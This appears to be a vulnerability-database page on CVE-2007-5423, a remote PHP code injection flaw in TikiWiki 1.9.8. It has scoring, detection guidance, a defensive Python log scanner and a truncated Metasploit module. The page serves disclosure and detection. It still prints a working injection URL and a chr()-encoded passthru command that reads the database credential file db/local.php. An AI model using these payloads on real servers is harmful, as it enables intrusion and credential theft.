CVE-2007-5423
Published 2007-10-12
Priority P268 · Severity high · CVSS 2.0 base score 7.5
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT available
EPSS: 76.66% (99.5th percentile)
tiki-graph_formula.php in TikiWiki 1.9.8 allows remote attackers to execute arbitrary code via PHP sequences in the f array parameter, which are processed by create_function.
Affected (11 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| tiki | tikiwiki_cms_groupware | <= 1.9.8 | — |
Detection & IOCs (extracted from sources)
- URL: http:/server/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=
- Command: passthru(chr(101).chr(99).chr(104).chr(111).chr(32).chr(89).chr(89).chr(89).chr(59).chr(99).chr(97).chr(116).chr(32).chr(100).chr(98).chr(47).chr(108).chr(111).chr(99).chr(97).chr(108).chr(46).chr(112).chr(104).chr(112).chr(59).chr(101).chr(99).chr(104).chr(111).chr(32).chr(89).chr(89).chr(89))
- Monitor HTTP GET requests targeting tiki-graph_formula.php with an 'f[]' array parameter containing PHP function calls or code sequences (e.g., f[]=x.tan.phpinfo()), which are passed unsanitized to create_function().
- Alert on HTTP requests to tiki-graph_formula.php where the f[] parameter contains dot-concatenated PHP function names (e.g., x.tan.phpinfo()), a pattern characteristic of this exploit's injection syntax.
- Detect exploitation attempts using the Metasploit module's characteristic User-Agent string 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)' combined with requests to tiki-graph_formula.php.
- Flag requests to tiki-graph_formula.php with query parameters t=pdf or t=png alongside f[] array values, as these are required parameters in the exploit's build_uri() construction.
- Monitor for post-exploitation file reads of db/local.php via passthru() or similar PHP execution functions, which the Metasploit module uses to harvest TikiWiki database credentials.
- The vulnerable script does not sanitize user input supplied to create_function(); detect any f[] parameter value containing parentheses, PHP built-in function names, or chr() sequences in requests to tiki-graph_formula.php.
- The Metasploit payload space is constrained to 6144 bytes because Apache's maximum URI length is 8190 bytes; payloads delivered via the GET URI are limited accordingly.
- The character 'x' is a bad character for payloads because the vulnerable code replaces it with '$x'; encoders must avoid 'x' as well as backtick, double-quote, single-quote, space, percent, and ampersand.
- The exploit targets TikiWiki versions 1.9.x up to and including 1.9.8; the module's version check reports versions newer than 1.9.8 as not vulnerable.
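As an added defender-side example (not from the advisory, the Metasploit module or TikiWiki), a Python access-log check for the request pattern the bullets above describe: requests to tiki-graph_formula.php whose f[] value carries non-math function calls, chr() sequences or PHP dot-concatenation. The MATH_FUNCS whitelist and the sample log lines are constructed assumptions for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

SCRIPT = "tiki-graph_formula.php"
# Names a plotted formula may legitimately call; any other name followed by "("
# is treated as PHP. This set is an assumption for the example, not TikiWiki's list.
MATH_FUNCS = {"sin", "cos", "tan", "sqrt", "log", "exp", "abs", "pow"}
CALL_RE = re.compile(r"([A-Za-z_]\w*)\s*\(")           # name( -> a call
DOTCAT_RE = re.compile(r"[A-Za-z_)]\.[A-Za-z_(]")       # x.tan.phpinfo, chr(89).chr(89)
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*"')

def suspicious_reasons(formula):
    """Indicators found in one f[] value; an empty list means it looks like math."""
    reasons = []
    non_math = sorted({n.lower() for n in CALL_RE.findall(formula)} - MATH_FUNCS)
    if non_math:                   # phpinfo(), passthru(), chr() ...
        reasons.append("non-math call(s): " + ",".join(non_math))
    if DOTCAT_RE.search(formula):  # PHP string concatenation, never a formula
        reasons.append("dot-concatenation")
    return reasons

def inspect_request(target):
    """Return all indicators for one request target (path plus query string)."""
    parts = urlsplit(target)
    if not parts.path.endswith(SCRIPT):
        return []
    params = parse_qs(parts.query, keep_blank_values=True)  # f%5B%5D decodes to f[]
    reasons = []
    for value in params.get("f[]", []) + params.get("f", []):
        reasons.extend(suspicious_reasons(value))
    return reasons

def scan_log(lines):
    """Return (client_ip, target, reasons) for every flagged combined-format line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        reasons = inspect_request(m.group(2)) if m else []
        if reasons:
            hits.append((m.group(1), m.group(2), reasons))
    return hits

# Constructed sample access-log lines (not real traffic): the advisory's own
# request form, a benign plot, and a percent-encoded attempt.
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Oct/2007:10:00:00 +0000] "GET /tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title= HTTP/1.1" 200 512 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
    '192.0.2.11 - - [12/Oct/2007:10:01:00 +0000] "GET /tikiwiki/tiki-graph_formula.php?w=400&h=300&s=1&min=-3&max=3&f[]=sin(x)&t=png&title=sine HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '192.0.2.12 - - [12/Oct/2007:10:02:00 +0000] "GET /tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f%5B%5D=x.passthru(chr(89).chr(89).chr(89))&t=pdf HTTP/1.1" 200 300 "-" "curl/7.16"',
]
```

Calling `scan_log(SAMPLE_LOG)` returns the first and third requests with their reasons; the sin(x) plot is left alone.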
GHSA-xh3f-gcw3-fwjc (CVE-2007-5682, HIGH, CVSS 7.5, ghsa_unreviewed, 2022-05-01): Incomplete blacklist vulnerability in tiki-graph_formula
Incomplete blacklist vulnerability in tiki-graph_formula.php in TikiWiki before 1.9.8.2 allows remote attackers to execute arbitrary code by using variable functions and variable variables to write variables whose names match the whitelist, a different vulnerability than CVE-2007-5423.
GHSA-gg68-5jj6-x44x (CVE-2007-5423, HIGH, CWE-94, ghsa_unreviewed, 2022-05-01): tiki-graph_formula
tiki-graph_formula.php in TikiWiki 1.9.8 allows remote attackers to execute arbitrary code via PHP sequences in the f array parameter, which are processed by create_function.
No detection rules found.
Exploit-DB · 2010-09-20 · CVE-2007-5423
TikiWiki tiki-graph_formula - PHP Remote Code Execution (Metasploit)
---
```ruby
##
# $Id: tikiwiki_graph_formula_exec.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

# NOTE: in the indexed copy everything between a '<' and the next '>' was lost
# (the parent class, rank/mixin lines, the initialize skeleton and the author
# e-mail). The standard Metasploit3 skeleton is restored here around the values
# that survived; the module is truncated after the 'Payload' hash.
class Metasploit3 < Msf::Exploit::Remote
  # rank and mixin includes not preserved in this excerpt

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'TikiWiki tiki-graph_formula Remote PHP Code Execution',
      'Description' => %q{
        TikiWiki (<= 1.9.8) contains a flaw that may allow a remote attacker to
        execute arbitrary PHP code. The issue is due to 'tiki-graph_formula.php'
        script not properly sanitizing user input supplied to create_function(),
        which may allow a remote attacker to execute arbitrary PHP code resulting
        in a loss of integrity.
      },
      'Author'      => [ 'Matteo Cantoni', 'jduck' ],
      'License'     => MSF_LICENSE,
      'Version'     => '$Revision: 10394 $',
      'References'  =>
        [
          ['CVE', '2007-5423'],
          ['OSVDB', '40478'],
          ['BID', '26006'],
        ],
      'Privileged'  => false,
      'Payload'     =>
        {
          'DisableNops' => true,
          # 6k. Really it's the max
          # (excerpt ends here on the source page)
```
Exploit-DB · 2007-10-10 · CVE-2007-5423
TikiWiki 1.9.8 - Remote PHP Injection
---
TikiWiki 1.9.8 Remote PHP Injection Vulnerability
Example: http:/server/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=
# milw0rm.com [2007-10-10]
Metasploit module: TikiWiki tiki-graph_formula Remote PHP Code Execution
TikiWiki (<= 1.9.8) contains a flaw that may allow a remote attacker to execute arbitrary PHP code. The issue is due to 'tiki-graph_formula.php' script not properly sanitizing user input supplied to create_function(), which may allow a remote attacker to execute arbitrary PHP code resulting in a loss of integrity.
No writeups or analysis indexed.
References
- http://bugs.gentoo.org/show_bug.cgi?id=195503
- http://osvdb.org/40478
- http://secunia.com/advisories/27190
- http://secunia.com/advisories/27344
- http://securityreason.com/securityalert/3216
- http://securityvulns.ru/Sdocument162.html
- http://sourceforge.net/forum/forum.php?forum_id=744898
- http://sourceforge.net/project/shownotes.php?release_id=546283&group_id=64258
- http://www.gentoo.org/security/en/glsa/glsa-200710-21.xml
- http://www.securityfocus.com/archive/1/482006/100/0/threaded
- http://www.securityfocus.com/archive/1/482128/100/0/threaded
- http://www.securityfocus.com/bid/26006
- http://www.vupen.com/english/advisories/2007/3492
- https://exchange.xforce.ibmcloud.com/vulnerabilities/37076
- https://www.exploit-db.com/exploits/4509